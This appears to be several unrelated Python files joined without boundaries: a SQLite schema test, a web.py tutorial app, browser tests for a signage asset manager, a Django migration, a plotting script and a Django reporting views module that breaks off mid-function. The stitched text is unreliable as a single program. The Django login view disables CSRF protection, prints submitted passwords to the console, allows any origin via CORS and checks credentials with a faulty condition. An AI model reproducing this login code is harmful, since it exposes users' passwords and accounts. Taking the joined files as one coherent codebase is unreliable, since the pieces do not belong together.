    def prepopulate(self):
        DB_MAGIC = 0x71534d41
        DB_VERSION = 0

        conn = sqlite3.connect(self.dbname)
        conn.executescript("""
CREATE TABLE generation (inverter_serial INTEGER,
                            timestamp INTEGER,
                            total_yield INTEGER,
                            PRIMARY KEY (inverter_serial, timestamp));
CREATE TABLE schema (magic INTEGER, version INTEGER);
CREATE TABLE pvoutput (sid STRING,
                       last_datetime_uploaded INTEGER);""")
        conn.execute("INSERT INTO schema (magic, version) VALUES (?, ?)",
                     (DB_MAGIC, DB_VERSION))
        conn.commit()


        conn.execute("""INSERT INTO generation (inverter_serial, timestamp,
                                                 total_yield)
                            VALUES (?, ?, ?)""", self.PRESERVE_RECORD)
        conn.commit()

        del conn


class BadSchemaSQLiteChecker(BaseSQLite):
    def setUp(self):
        self.prepare_sqlite()

    @raises(smadata2.db.WrongSchema)
    def test_open(self):
        self.db = smadata2.db.SQLiteDatabase(self.dbname)


class TestEmptySQLiteDB(BadSchemaSQLiteChecker):
    """Check that we correctly fail on an empty DB"""

    def test_is_empty(self):
        assert not os.path.exists(self.dbname)


class TestBadSQLite(BadSchemaSQLiteChecker):
    """Check that we correctly fail attempting to update an unknwon format"""

    def prepopulate(self):
        conn = sqlite3.connect(self.dbname)
        conn.execute("CREATE TABLE unrelated (random STRING, data INTEGER)")
        conn.commit()
        del conn

    @raises(smadata2.db.WrongSchema)
    def test_update(self):
        db = smadata2.db.sqlite.create_or_update(self.dbname)

import web


urls = (
        '/hello','Index'
        )


app = web.application(urls,globals())

render = web.template.render('/usr/local/LPTHW/ex51/gothonweb/templates/',base="layout")



class Index(object):
    def GET(self):

        return render.hello_form()

    def POST(self):
        form = web.input(name="Nobody",greet="Hello")

        greeting = "%s,%s" % (form.greet,form.name)

        return render.index(greeting = greeting)



if __name__ == '__main__':
    app.run()

from splinter import Browser
from time import sleep
from selenium.common.exceptions import ElementNotVisibleException
from settings import settings
from lib import db
from lib import assets_helper
import unittest
from datetime import datetime, timedelta

asset_x = {
    'mimetype': u'web',
    'asset_id': u'4c8dbce552edb5812d3a866cfe5f159d',
    'name': u'WireLoad',
    'uri': u'http://www.wireload.net',
    'start_date': datetime.now() - timedelta(days=1),
    'end_date': datetime.now() + timedelta(days=1),
    'duration': u'5',
    'is_enabled': 0,
    'nocache': 0,
    'play_order': 1,
}

asset_y = {
    'mimetype': u'image',
    'asset_id': u'7e978f8c1204a6f70770a1eb54a76e9b',
    'name': u'Google',
    'uri': u'https://www.google.com/images/srpr/logo3w.png',
    'start_date': datetime.now() - timedelta(days=1),
    'end_date': datetime.now() + timedelta(days=1),
    'duration': u'6',
    'is_enabled': 1,
    'nocache': 0,
    'play_order': 0,
}

main_page_url = 'http://foo:bar@localhost:8080'
settings_url = 'http://foo:bar@localhost:8080/settings'
system_info_url = 'http://foo:bar@localhost:8080/system_info'


def wait_for_and_do(browser, query, callback):
    not_filled = True
    n = 0

    while not_filled:
        try:
            callback(browser.find_by_css(query).first)
            not_filled = False
        except ElementNotVisibleException, e:
            if n > 20:
                raise e
            n += 1


class WebTest(unittest.TestCase):
    def setUp(self):
        with db.conn(settings['database']) as conn:
            assets = assets_helper.read(conn)
            for asset in assets:
                assets_helper.delete(conn, asset['asset_id'])

    def tearDown(self):
        pass

    def test_add_asset_url(self):
        with Browser() as browser:
            browser.visit(main_page_url)

            wait_for_and_do(browser, '#add-asset-button', lambda btn: btn.click())
            sleep(1)

            wait_for_and_do(browser, 'input[name="uri"]', lambda field: field.fill('http://example.com'))
            sleep(1)

            wait_for_and_do(browser, '#add-form', lambda form: form.click())
            sleep(1)

            wait_for_and_do(browser, '#save-asset', lambda btn: btn.click())
            sleep(3)  # backend need time to process request

        with db.conn(settings['database']) as conn:
            assets = assets_helper.read(conn)

            self.assertEqual(len(assets), 1)
            asset = assets[0]

            self.assertEqual(asset['name'], u'http://example.com')
            self.assertEqual(asset['uri'], u'http://example.com')
            self.assertEqual(asset['mimetype'], u'webpage')
            self.assertEqual(asset['duration'], settings['default_duration'])

    def test_edit_asset(self):
        with db.conn(settings['database']) as conn:
            assets_helper.create(conn, asset_x)

        with Browser() as browser:
            browser.visit(main_page_url)
            wait_for_and_do(browser, '.edit-asset-button', lambda btn: btn.click())
            sleep(1)

            wait_for_and_do(browser, 'input[name="duration"]', lambda field: field.fill('333'))
            sleep(1)  # wait for new-asset panel animation

            wait_for_and_do(browser, '#add-form', lambda form: form.click())
            sleep(1)

            wait_for_and_do(browser, '#save-asset', lambda btn: btn.click())
            sleep(3)  # backend need time to process request

        with db.conn(settings['database']) as conn:
            assets = assets_helper.read(conn)

            self.assertEqual(len(assets), 1)
            asset = assets[0]

            self.assertEqual(asset['duration'], u'333')

    def test_add_asset_image_upload(self):
        image_file = '/tmp/image.png'

        with Browser() as browser:
            browser.visit(main_page_url)

            browser.find_by_id('add-asset-button').click()
            sleep(1)

            wait_for_and_do(browser, 'a[href="#tab-file_upload"]', lambda tab: tab.click())
            wait_for_and_do(browser, 'input[name="file_upload"]', lambda input: input.fill(image_file))
            sleep(1)  # wait for new-asset panel animation

            sleep(3)  # backend need time to process request

        with db.conn(settings['database']) as conn:
            assets = assets_helper.read(conn)

            self.assertEqual(len(assets), 1)
            asset = assets[0]

            self.assertEqual(asset['name'], u'image.png')
            self.assertEqual(asset['mimetype'], u'image')
            self.assertEqual(asset['duration'], settings['default_duration'])

    def test_add_asset_video_upload(self):
        video_file = '/tmp/video.flv'

        with Browser() as browser:
            browser.visit(main_page_url)

            browser.find_by_id('add-asset-button').click()
            sleep(1)

            wait_for_and_do(browser, 'a[href="#tab-file_upload"]', lambda tab: tab.click())
            wait_for_and_do(browser, 'input[name="file_upload"]', lambda input: input.fill(video_file))
            sleep(1)  # wait for new-asset panel animation

            sleep(3)  # backend need time to process request

        with db.conn(settings['database']) as conn:
            assets = assets_helper.read(conn)

            self.assertEqual(len(assets), 1)
            asset = assets[0]

            self.assertEqual(asset['name'], u'video.flv')
            self.assertEqual(asset['mimetype'], u'video')
            self.assertEqual(asset['duration'], u'54')

    def test_add_two_assets_upload(self):
        video_file = '/tmp/video.flv'
        image_file = '/tmp/image.png'

        with Browser() as browser:
            browser.visit(main_page_url)

            browser.find_by_id('add-asset-button').click()
            sleep(1)

            wait_for_and_do(browser, 'a[href="#tab-file_upload"]', lambda tab: tab.click())
            wait_for_and_do(browser, 'input[name="file_upload"]', lambda input: input.fill(image_file))
            wait_for_and_do(browser, 'input[name="file_upload"]', lambda input: input.fill(video_file))

            sleep(3)  # backend need time to process request

        with db.conn(settings['database']) as conn:
            assets = assets_helper.read(conn)

            self.assertEqual(len(assets), 2)

            self.assertEqual(assets[0]['name'], u'image.png')
            self.assertEqual(assets[0]['mimetype'], u'image')
            self.assertEqual(assets[0]['duration'], settings['default_duration'])

            self.assertEqual(assets[1]['name'], u'video.flv')
            self.assertEqual(assets[1]['mimetype'], u'video')
            self.assertEqual(assets[1]['duration'], u'54')

    def test_add_asset_streaming(self):
        with Browser() as browser:
            browser.visit(main_page_url)

            wait_for_and_do(browser, '#add-asset-button', lambda btn: btn.click())
            sleep(1)

            wait_for_and_do(browser, 'input[name="uri"]', lambda field: field.fill('rtmp://localhost:1935/app/video.flv'))
            sleep(1)

            wait_for_and_do(browser, '#add-form', lambda form: form.click())
            sleep(1)

            wait_for_and_do(browser, '#save-asset', lambda btn: btn.click())
            sleep(10)  # backend need time to process request

        with db.conn(settings['database']) as conn:
            assets = assets_helper.read(conn)

            self.assertEqual(len(assets), 1)
            asset = assets[0]

            self.assertEqual(asset['name'], u'rtmp://localhost:1935/app/video.flv')
            self.assertEqual(asset['uri'], u'rtmp://localhost:1935/app/video.flv')
            self.assertEqual(asset['mimetype'], u'streaming')
            self.assertEqual(asset['duration'], settings['default_streaming_duration'])

    def test_rm_asset(self):
        with db.conn(settings['database']) as conn:
            assets_helper.create(conn, asset_x)

        with Browser() as browser:
            browser.visit(main_page_url)

            wait_for_and_do(browser, '.delete-asset-button', lambda btn: btn.click())
            wait_for_and_do(browser, '.confirm-delete', lambda btn: btn.click())
            sleep(3)  # backend need time to process request

        with db.conn(settings['database']) as conn:
            assets = assets_helper.read(conn)
            self.assertEqual(len(assets), 0)

    def test_enable_asset(self):
        with db.conn(settings['database']) as conn:
            assets_helper.create(conn, asset_x)

        with Browser() as browser:
            browser.visit(main_page_url)
            wait_for_and_do(browser, 'span[class="on"]', lambda btn: btn.click())
            sleep(3)  # backend need time to process request

        with db.conn(settings['database']) as conn:
            assets = assets_helper.read(conn)
            self.assertEqual(len(assets), 1)

            asset = assets[0]
            self.assertEqual(asset['is_enabled'], 1)

    def test_disable_asset(self):
        with db.conn(settings['database']) as conn:
            _asset_x = asset_x.copy()
            _asset_x['is_enabled'] = 1
            assets_helper.create(conn, _asset_x)

        with Browser() as browser:
            browser.visit(main_page_url)

            wait_for_and_do(browser, 'span[class="off"]', lambda btn: btn.click())
            sleep(3)  # backend need time to process request

        with db.conn(settings['database']) as conn:
            assets = assets_helper.read(conn)
            self.assertEqual(len(assets), 1)

            asset = assets[0]
            self.assertEqual(asset['is_enabled'], 0)

    def test_reorder_asset(self):
        with db.conn(settings['database']) as conn:
            _asset_x = asset_x.copy()
            _asset_x['is_enabled'] = 1
            assets_helper.create(conn, _asset_x)
            assets_helper.create(conn, asset_y)

        with Browser() as browser:
            browser.visit(main_page_url)

            asset_x_for_drag = browser.find_by_id(asset_x['asset_id'])
            sleep(1)

            asset_y_to_reorder = browser.find_by_id(asset_y['asset_id'])
            asset_x_for_drag.drag_and_drop(asset_y_to_reorder)
            sleep(3)  # backend need time to process request

        with db.conn(settings['database']) as conn:
            x = assets_helper.read(conn, asset_x['asset_id'])
            y = assets_helper.read(conn, asset_y['asset_id'])

            self.assertEqual(x['play_order'], 0)
            self.assertEqual(y['play_order'], 1)

    def test_settings_page_should_work(self):
        with Browser() as browser:
            browser.visit(settings_url)
            self.assertEqual(browser.is_text_present('Error: 500 Internal Server Error'), False,
                             '500: internal server error not expected')

    def test_system_info_page_should_work(self):
        with Browser() as browser:
            browser.visit(system_info_url)
            self.assertEqual(browser.is_text_present('Error: 500 Internal Server Error'), False,
                             '500: internal server error not expected')

# encoding: utf8
from django.db import models, migrations


class Migration(migrations.Migration):
    
    dependencies = []

    operations = [
        migrations.CreateModel(
            fields = [(u'id', models.AutoField(verbose_name=u'ID', serialize=False, auto_created=True, primary_key=True),), ('name', models.CharField(max_length=255),), ('email', models.EmailField(max_length=75),), ('message', models.TextField(),), ('date', models.DateField(auto_now=True),)],
            bases = (models.Model,),
            options = {},
            name = 'Contact',
        ),
        migrations.CreateModel(
            fields = [(u'id', models.AutoField(verbose_name=u'ID', serialize=False, auto_created=True, primary_key=True),), ('date', models.DateTimeField(),), ('title', models.CharField(max_length=255),), ('code', models.CharField(max_length=255),), ('summary', models.TextField(),)],
            bases = (models.Model,),
            options = {},
            name = 'Commits',
        ),
    ]

# force floating point division. Can still use integer with //
from __future__ import division
# This file is used for importing the common utilities classes.
import numpy as np
import matplotlib.pyplot as plt
import sys


sys.path.append("../../../../../")
from EnergyLandscapes.Lifetime_Dudko2008.Python.TestExamples.Util import \
    Example_Data

def PlotFit(data,BaseName):
    fig = Example_Data.PlotHistograms(data)
    fig.savefig(BaseName + "_Histogram.png")
    fig = Example_Data.PlotLifetimesAndFit(data)
    fig.savefig(BaseName + "_Lifetimes.png")
    
def run():
    """

    """
    # figure 1 from dudko 2008
    data = Example_Data.Dudko2008Fig1_Probabilities()
    PlotFit(data,"../Out/Dudko2008_Fig1")
    # figure 2 frm dudko 2008
    data = Example_Data.Dudko2008Fig2_Probabilities()
    PlotFit(data,"../Out/Dudko2008_Fig2")




if __name__ == "__main__":
    run()

#!/usr/bin/env python
# -*- coding: utf-8 -*-
from django.shortcuts import render, redirect, HttpResponse
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from django.views.decorators.csrf import csrf_exempt
from subscriber.models import Consumer, ConsumerType, Recharge, TotalRecharge, ACL
from product.models import Product
from voice_records.models import VoiceRecord, VoiceReg
from sms.models import SMSPayment
# from local_lib.v3 import is_number, is_float
from local_lib.v3 import is_number, is_float, is_bangladeshi_number, is_japanese_number, send_sms
from transaction.models import Transaction, ProductsInTransaction, BuyerSellerAccount, dueTransaction
from shop_inventory.models import Inventory, BuySellProfitInventoryIndividual, BuySellProfitInventory
from transcriber_management.models import Transcriber, TranscriberInTranscription, FailedTranscription
import datetime
from django.db.models import Q
from django.contrib.auth.models import User
from django.contrib.sessions.backends.db import SessionStore
from django.db.models import Count




@csrf_exempt
def login_page(request):
    return render(request, 'pages/login.html')


@csrf_exempt
def login_auth(request):
    postdata = request.POST
    print(postdata)
    if 'username' and 'password' in postdata:
        print(postdata['username'])
        login_username = postdata['username']
        print(postdata['password'])
        if ACL.objects.filter(loginID=postdata['username'][-9:]).exists():
            login_username = login_username[-9:]
        else:
            login_username = login_username
        user = authenticate(username=login_username, password=postdata['password'])
        if user is not None:
            if user.is_active:
                login(request, user)
                request.session['user'] = login_username
                if user.is_superuser:
                    res = redirect('/admin')
                else:
                    res = redirect('/')
            else:
                res = render(request, 'pages/login.html',
                             {'wrong': True,
                              'text': 'The password is valid, but the account has been disabled!'})
        else:
            res = render(request, 'pages/login.html',
                         {'wrong': True,
                          'text': 'The username and password you have entered is not correct. Please retry'})
    else:
        res = render(request, 'pages/login.html', {'wrong': False})

    res['Access-Control-Allow-Origin'] = "*"
    res['Access-Control-Allow-Headers'] = "Origin, X-Requested-With, Content-Type, Accept"
    res['Access-Control-Allow-Methods'] = "PUT, GET, POST, DELETE, OPTIONS"
    return res


def logout_now(request):
    logout(request)
    return render(request, 'pages/login.html')


@login_required(login_url='/login/')
def home(request):
    transcriber_name = request.session['user']
    print request.session['user']
    if ACL.objects.filter(loginID=transcriber_name).exists():
        login_user = ACL.objects.get(loginID=transcriber_name)
        print(login_user.loginUser.name)
        transcriber_name = login_user.loginUser.name
        if login_user.loginUser.type.type_name == 'Distributor':
            if login_user.loginUser.number_of_child == 'CHANGED !!!':
                return render(request, 'pages/Distributor/index.html', {'transcriber_name': transcriber_name})
            else:
                return redirect('/change_password/')
        elif login_user.loginUser.type.type_name == 'SR':
            if login_user.loginUser.number_of_child == 'CHANGED !!!':
                return render(request, 'pages/SR/index.html', {'transcriber_name': transcriber_name})
            else:
                return redirect('/change_password/')
        elif login_user.loginUser.type.type_name == 'Seller':
            if login_user.loginUser.number_of_child == 'CHANGED !!!':
                return render(request, 'pages/Shop/index.html', {'transcriber_name': transcriber_name})
            else:
                return redirect('/change_password/')
        elif login_user.loginUser.type.type_name == 'Buyer':
            if login_user.loginUser.number_of_child == 'CHANGED !!!':
                return render(request, 'pages/Consumer/index.html', {'transcriber_name': transcriber_name})
            else:
                return redirect('/change_password/')
    else:
        number_of_reg_calls = VoiceReg.objects.filter().count()
        number_of_transaction_calls = VoiceRecord.objects.filter().count()
        total = number_of_reg_calls + number_of_transaction_calls
        if total > 0:
            reg_call_percentage = (number_of_reg_calls / float(total)) * 100
            transaction_call_percentage = (number_of_transaction_calls / float(total)) * 100
        else:
            transaction_call_percentage = 0
            reg_call_percentage = 0
        today_month = datetime.date.today().month
        today_year = datetime.date.today().year
        count = 1
        data_2 = ''
        data_3 = ''
        data_4 = ''
        data_5 = ''
        data_6 = ''
        max = 0
        max_table_2 = 0
        total_sell = VoiceRecord.objects.filter(purpose='sell').count()
        total_buy = VoiceRecord.objects.filter(purpose='buy').count()
        total_money_transaction = SMSPayment.objects.filter().count()
        total_for_chart2 = number_of_reg_calls + number_of_transaction_calls
        if total_for_chart2 > 0:
            sell_percentage = (total_sell / float(total_for_chart2)) * 100
            buy_percentage = (total_buy / float(total_for_chart2)) * 100
            money_transaction_percentage = (total_money_transaction / float(total_for_chart2)) * 100
        else:
            sell_percentage = 0
            buy_percentage = 0
            money_transaction_percentage = 0
        while count < 32:
            total_call_that_day = VoiceRecord.objects.filter(DateAdded__month=today_month,
                                                             DateAdded__year=today_year, DateAdded__day=count).count()
            total_reg_that_day = VoiceReg.objects.filter(DateAdded__month=today_month,
                                                         DateAdded__year=today_year, DateAdded__day=count).count()
            if max < total_call_that_day:
                max = total_call_that_day + 2
            if max < total_reg_that_day:
                max = total_reg_that_day + 2

            data_2 += '[gd(%s, %s, %s), %s],' % (today_year, today_month, count, total_call_that_day)
            data_3 += '[gd(%s, %s, %s), %s],' % (today_year, today_month, count, total_reg_that_day)
            total_buy_that_day = VoiceRecord.objects.filter(DateAdded__month=today_month,
                                                            DateAdded__year=today_year,
                                                            DateAdded__day=count,
                                                            purpose='buy').count()
            total_sell_that_day = VoiceRecord.objects.filter(DateAdded__month=today_month,
                                                             DateAdded__year=today_year,
                                                             DateAdded__day=count,
                                                             purpose='sell').count()
            total_payment_that_day = SMSPayment.objects.filter(DateAdded__month=today_month,
                                                               DateAdded__year=today_year,
                                                               DateAdded__day=count).count()
            if max_table_2 < total_buy_that_day:
                max_table_2 = total_buy_that_day + 2
            if max_table_2 < total_sell_that_day:
                max_table_2 = total_sell_that_day + 2
            if max_table_2 < total_payment_that_day:
                max_table_2 = total_payment_that_day + 2
            data_4 += '[gd(%s, %s, %s), %s],' % (today_year, today_month, count, total_buy_that_day)
            data_5 += '[gd(%s, %s, %s), %s],' % (today_year, today_month, count, total_sell_that_day)
            data_6 += '[gd(%s, %s, %s), %s],' % (today_year, today_month, count, total_payment_that_day)

            count += 1
        data_2 = data_2[:-1]
        data_3 = data_3[:-1]
        data_4 = data_4[:-1]
        data_5 = data_5[:-1]
        data_6 = data_6[:-1]
        number_of_transactions = Transaction.objects.filter().count()
        number_of_transactions_with_due = Transaction.objects.filter(total_due__gt=0).count()
        number_of_transactions_without_due = Transaction.objects.filter(total_due__lte=0).count()
        shop_consumer = ConsumerType.objects.get(type_name='Seller')
        all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
        all_user_for_base = Consumer.objects.all()
        shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
        all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)
        print(all_consumer_for_base.count)
        return render(request, 'pages/index.html', {'shop_list_base': all_shop_for_base,
                                                    'number_of_reg_calls': number_of_reg_calls,
                                                    'transcriber_name': transcriber_name,
                                                    'number_of_transaction_calls': number_of_transaction_calls,
                                                    'all_consumer_for_base' :all_consumer_for_base,
                                                    'reg_call_percentage': reg_call_percentage,
                                                    'transaction_call_percentage': transaction_call_percentage,
                                                    'data_2': data_2,
                                                    'data_3': data_3,
                                                    'data_4': data_4,
                                                    'data_5': data_5,
                                                    'data_6': data_6,
                                                    'max': max,
                                                    'number_of_transactions': number_of_transactions,
                                                    'number_of_transactions_with_due': number_of_transactions_with_due,
                                                    'number_of_transactions_without_due': number_of_transactions_without_due,
                                                    'max_table_2': max_table_2,
                                                    'total_sell': total_sell,
                                                    'total_buy': total_buy,
                                                    'total_money_transaction': total_money_transaction,
                                                    'sell_percentage': sell_percentage,
                                                    'buy_percentage': buy_percentage,
                                                    'money_transaction_percentage': money_transaction_percentage,
                                                    'all_user_for_base': all_user_for_base})


@login_required(login_url='/login/')
def translator_page(request):
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    all_user_for_base = Consumer.objects.all()
    transcriber_name = request.session['user']
    shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)

    return render(request, 'pages/translator.html', {'shop_list_base': all_shop_for_base,
                                                     'all_consumer_for_base' :all_consumer_for_base,
                                                     'transcriber_name': transcriber_name,
                                                     'all_user_for_base': all_user_for_base})


# all report views are here
@login_required(login_url='/login/')
def report_monthly_shop(request):
    get_data = request.GET
    if 'ban' in get_data:
        bangla = True
    else:
        bangla = False

    shop_name = get_data['shop']
    shop_object = Consumer.objects.get(name=shop_name)
    shop_id = shop_object.id
    total_sell = 0
    total_sell_due = 0
    total_sell_paid = 0
    total_purchase = 0
    total_purchase_due = 0
    total_purchase_paid = 0
    for month_sell in BuyerSellerAccount.objects.filter(seller=shop_object):
        total_sell += month_sell.total_amount_of_transaction
        total_sell_due += month_sell.total_due
        total_sell_paid += month_sell.total_paid
    for month_purchase in BuyerSellerAccount.objects.filter(buyer=shop_object):
        total_purchase += month_purchase.total_amount_of_transaction
        total_purchase_due += month_purchase.total_due
        total_purchase_paid += month_purchase.total_paid



    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    all_user_for_base = Consumer.objects.all()
    transcriber_name = request.session['user']
    shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)

    return render(request, 'pages/report_monthly_shop.html', {'shop_list_base': all_shop_for_base,
                                                              'shop_name': shop_name,
                                                              'shop_id': shop_id,
                                                              'all_consumer_for_base' :all_consumer_for_base,
                                                              'total_sell': total_sell,
                                                              'transcriber_name': transcriber_name,
                                                              'total_sell_due': total_sell_due,
                                                              'total_sell_paid': total_sell_paid,
                                                              'bangla': bangla,
                                                              'total_purchase': total_purchase,
                                                              'total_purchase_due': total_purchase_due,
                                                              'total_purchase_paid': total_purchase_paid,
                                                              'all_user_for_base': all_user_for_base})

# report_monthly_shop_json
@login_required(login_url='/login/')
def report_monthly_shop_json(request):
    get_data = request.GET
    shop_name = get_data['shop']
    shop_object = Consumer.objects.get(id=shop_name)

    shop_inventory = BuySellProfitInventoryIndividual.objects.filter(shop=shop_object)
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    output = '{"data": [ '

    if get_data['t'] == '1':
        rank = 1
        this_year = datetime.date.today().year
        # this_month = 1
        this_day = 1
        for this_month in range(1, 13, 1):
            count = 0
            for this_day in range(1, 32, 1):
                for a_product in Product.objects.all():

                    product_price = 0
                    product_name = a_product.name
                    total_sell = 0
                    total_due = 0
                    total_paid = 0
                    for this_day_sell_transaction in Transaction.objects.filter(seller=shop_object,
                                                                                DateAdded__year=this_year,
                                                                                DateAdded__month=this_month,
                                                                                DateAdded__day=this_day):
                        total_sell += this_day_sell_transaction.total_amount
                        total_due += this_day_sell_transaction.total_due
                        total_paid += this_day_sell_transaction.total_paid
                        count += 1

                    total_purchase = 0
                    total_purchase_due = 0
                    total_purchase_paid = 0
                    for this_day_purchase_transaction in Transaction.objects.filter(buyer=shop_object,
                                                                                    DateAdded__year=this_year,
                                                                                    DateAdded__month=this_month,
                                                                                    DateAdded__day=this_day):
                        total_purchase += this_day_purchase_transaction.total_amount
                        total_purchase_due += this_day_purchase_transaction.total_due
                        total_purchase_paid += this_day_purchase_transaction.total_paid
                        count += 1

                if count > 0:
                    output += '["%s/%s/%s","%s","%s","%s","%s","%s","%s"] ,' % (this_day, this_month, this_year,
                                                                                total_sell, total_paid, total_due,
                                                                                total_purchase, total_purchase_paid,
                                                                                total_purchase_due)
                    count = 0
                    # this_day += 1
                    # this_month = this_month + 1
    if get_data['t'] == '2':
        for this_day_transaction in Transaction.objects.filter(Q(seller=shop_object) | Q(buyer=shop_object)):
            # start counting for this product
            id = this_day_transaction.pk
            date = this_day_transaction.DateAdded
            if this_day_transaction.seller == shop_object:
                with_trade = this_day_transaction.buyer
                trade_type = 'Sell'
            elif this_day_transaction.buyer == shop_object:
                with_trade = this_day_transaction.seller
                trade_type = 'Buy'
            number_of_items = ProductsInTransaction.objects.filter(TID=this_day_transaction).count()
            total_amount = this_day_transaction.total_amount
            total_paid = this_day_transaction.total_paid
            total_due = this_day_transaction.total_due

            output += '["%s","%s","%s","%s","%s","%s","%s","%s"] ,' % (id, date, with_trade, trade_type,
                                                                       number_of_items, total_amount,
                                                                       total_paid, total_due)

    output = output[:-1]
    output += ']}'
    return HttpResponse(output, content_type="text/plain")


@login_required(login_url='/login/')
def report_sales_analysis(request):
    get_data = request.GET
    shop_name = get_data['shop']
    shop_object = Consumer.objects.get(name=shop_name)
    shop_id = shop_object.id
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    all_shop_for_base = Consumer.objects.filter(type=shop_consumer)
    all_user_for_base = Consumer.objects.all()
    if 'ban' in get_data:
        bangla = True
    else:
        bangla = False
    transcriber_name = request.session['user']
    shop_consumer2 = ConsumerType.objects.get(type_name='Buyer')
    all_consumer_for_base = Consumer.objects.filter(type=shop_consumer2)

    return render(request, 'pages/report_sales_analysis.html', {'shop_list_base': all_shop_for_base,
                                                                'shop_name': shop_name,
                                                                'all_consumer_for_base' :all_consumer_for_base,
                                                                'shop_id': shop_id,
                                                                'bangla': bangla,
                                                                'transcriber_name': transcriber_name,
                                                                'all_user_for_base': all_user_for_base})


@login_required(login_url='/login/')
def report_sales_analysis_json(request):
    get_data = request.GET
    shop_name = get_data['shop']
    shop_object = Consumer.objects.get(id=shop_name)

    shop_inventory = BuySellProfitInventoryIndividual.objects.filter(shop=shop_object)
    shop_consumer = ConsumerType.objects.get(type_name='Seller')
    output = '{"data": [ '

    if get_data['t'] == '1':
        rank = 1
        for a_product in Product.objects.all():
            count = 0
            product_price = 0
            product_name = a_product.name
            for this_day_transaction in Transaction.objects.filter(seller=shop_object):
                # start counting for this product
                for product_in_this_transaction in ProductsInTransaction.objects.filter(TID=this_day_transaction):
                    if product_in_this_transaction.product == a_product:
                        if product_in_this_transaction.unit == a_product.bulk_wholesale_unit:
                            if a_product.bulk_to_retail_unit == 0:
                                count = count + product_in_this_transaction.quantity
                                product_price = product_price + product_in_this_transaction.price_per_unit
                            else:
                                count = count + product_in_this_transaction.quantity * a_product.bulk_to_retail_unit
                                product_price = product_price + product_in_this_transaction.price_per_unit / a_product.bulk_to_retail_unit
                        else:
                            count = count + product_in_this_transaction.quantity
                            product_price = product_price + product_in_this_transaction.price_per_unit

            if count > 0:
                output += '["%s","%s","%s"] ,' % (rank, product_name, str(count) + ' ' + a_product.retail_unit)
                rank += 1
    if get_data['t'] == '2':
        rank = 1
        for a_product in Product.objects.all():
            count = 0

            product_price = 0
            previous_product_price = 0
            change = 0
            product_name = a_product.name
            for this_day_transaction in Transaction.objects.filter(seller=shop_object):
                # start counting for this product
                for product_in_this_transaction in ProductsInTransaction.objects.filter(TID=this_day_transaction):
                    if product_in_this_transaction.product == a_product:
                        if count == 0:
                            previous_product_price = product_in_this_transaction.price_per_unit
                        product_price = product_in_this_transaction.price_per_unit
                        change += abs(previous_product_price - product_price)
                        count += 1
            if count > 0:
                output += '["%s","%s","%s","%s"] ,' % (rank, product_name, count,
                                                       change/count)
                rank += 1
    if get_data['t'] == '3':
        this_year = datetime.date.today().year
        this_month = datetime.date.today().month
        day = 1

        # output += '["%s/%s/%s","","","",""] ,' % (day, this_month, this_year)
        while day < 32:
            day_string = True
            rank = 1
            for a_product in Product.objects.all():
                count = 0
                product_price = 0
                product_name = a_product.name

                for this_day_transaction in Transaction.objects.filter(seller=shop_object, DateAdded__year=this_year,
                                                                       DateAdded__month=this_month, DateAdded__day=day):
                    # start counting for this product

                    for product_in_this_transaction in ProductsInTransaction.objects.filter(TID=this_day_transaction):

                        if product_in_this_transaction.product == a_product:
                            if product_in_this_transaction.unit == a_product.bulk_wholesale_unit:
                                if a_product.bulk_to_retail_unit == 0:
                                    count = count + product_in_this_transaction.quantity
                                    product_price = product_price + product_in_this_transaction.price_per_unit
                                else:
                                    count = count + product_in_this_transaction.quantity * a_product.bulk_to_retail_unit
                                    product_price = product_price + product_in_this_transaction.price_per_unit / a_product.bulk_to_retail_unit
                            else:
                                count = count + product_in_this_transaction.quantity
                                product_price = product_price + product_in_this_transaction.price_per_unit

                if count > 0:
                    if day_string:
                        output += '["%s/%s/%s","","","",""] ,' % (day, this_month, this_year)
                        day_string = False
                    output += '["","%s","%s","%s","%s"] ,' % (rank, product_name,
                                                              str(count) + ' ' + a_product.retail_unit,
                                                              float(product_price / count))
                    rank += 1
            day += 1
            # output += '["%s/%s/%s","","","",""] ,' % (day, this_month, this_year)
    if get_data['t'] == '4':
        day = 1

        # output += '["%s/%s/%s","","","",""] ,' % (day, this_month, this_year)
        while day < 8:
            day_string = True
            rank = 1
            for a_product in Product.objects.all():
                count = 0
                product_price = 0
                product_name = a_product.name

                for this_day_transaction in Transaction.objects.filter(seller=shop_object, DateAdded__week_day=day):
                    # start counting for this product

                    for product_in_this_transaction in ProductsInTransaction.objects.filter(TID=this_day_transaction):

                        if product_in_this_transaction.product == a_product:
                            if product_in_this_transaction.unit == a_product.bulk_wholesale_unit:
                                if a_product.bulk_to_retail_unit == 0:
                                    count = count + product_in_this_transaction.quantity
                                    product_price = product_price + product_in_this_transaction.price_per_unit
                                else:
                                    count = count + product_in_this_transaction.quantity * a_product.bulk_to_retail_unit
                                    product_price = product_price + product_in_this_transaction.price_per_unit / a_product.bulk_to_retail_unit
                            else:
                                count = count + product_in_this_transaction.quantity
                                product_price = product_price + product_in_this_transaction.price_per_unit

                if count > 0:
                    if day_string:
                        if day == 1:
                            output += '["%s","","","",""] ,' % 'Sunday'
                        elif day == 2:
                            output += '["%s","","","",""] ,' % 'Monday'
                        elif day == 3:
                            output += '["%s","","","",""] ,' % 'Tuesday'
                        elif day == 4:
                            output += '["%s","","","",""] ,' % 'Wednesday'
                        elif day == 5:
                            output += '["%s","","","",""] ,' % 'Thursday'
                        elif day == 6:
                            output += '["%s","","","",""] ,' % 'Friday'
                        elif day == 7:
                            output += '["%s","","","",""] ,' % 'Saturday'
                        day_string = False
                    output += '["","%s","%s","%s","%s"] ,' % (rank, product_name,
                                                              str(count) + ' ' + a_product.retail_unit,
                                                              float(product_price / count))
                    rank += 1
            day += 1
    if get_data['t'] == '5':
        this_year = datetime.date.today().year
        day_string = True
        for a_product in Product.objects.all():
            count = 0
            product_profit = 0
